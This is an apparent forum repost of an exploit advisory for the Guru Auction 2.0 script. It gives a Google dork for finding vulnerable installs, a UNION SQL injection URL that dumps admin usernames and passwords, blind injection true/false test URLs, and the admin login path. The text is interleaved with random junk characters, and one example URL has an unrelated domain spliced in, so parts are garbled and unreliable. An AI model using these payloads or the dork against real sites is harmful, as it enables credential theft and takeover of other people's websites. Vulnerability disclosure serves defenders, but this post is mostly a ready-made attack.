Guru Auction 2.0 Multiple SQL Injection Vulnerabilities6 H4 j4 J& O D9 y) w# z, O
& I. v9 C. ~) q0 v3 i作者 : v3n0m8 n2 C4 t% y0 Y5 A. [: g
应用 : Guru Auction 2.0: {, T8 S0 y& U2 ^3 X6 a+ h
Price : $49: M! \2 l; x9 t, u$ K! H, k/ Z9 z
Vendor : http://www.guruscript.com/
W7 O( j9 |% a; w! V8 AGoogle Dork : inurl:subcat.php?cate_id=
M$ K9 H7 L: S8 Z
8 q) X8 z& Z8 a4 {; Y) |SQLi p0c:8 s2 C& ~) X& M) l8 V; z
~~~~~~~~~~* z; _1 G; G6 ~( s( H+ {: z
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
, y4 u: M A4 ]( l8 r, t 5 p2 m: q0 _. _7 T. T: D
7 [" l4 R( z# o4 d f- H' P盲注 p0c:
( K& `, b8 ^- F Q+ z- V~~~~~~~~~~) M- _) s3 B5 S
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
7 ], o2 C$ @ ]& u, \# thttp://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false8 v6 |! T8 ]* o0 ^! V$ r O
/ ~* _( m* e& R: J管理登录入口:
" T3 W$ ~' x2 e~~~~~~~~~~
: _! _- ~ A E0 ?, Ohttp://domain.tld/[path]/admin/
7 ^5 |2 }+ F, a& k; v& A. M |
发表于 2012-12-31 09:24:05
收藏
支持
反对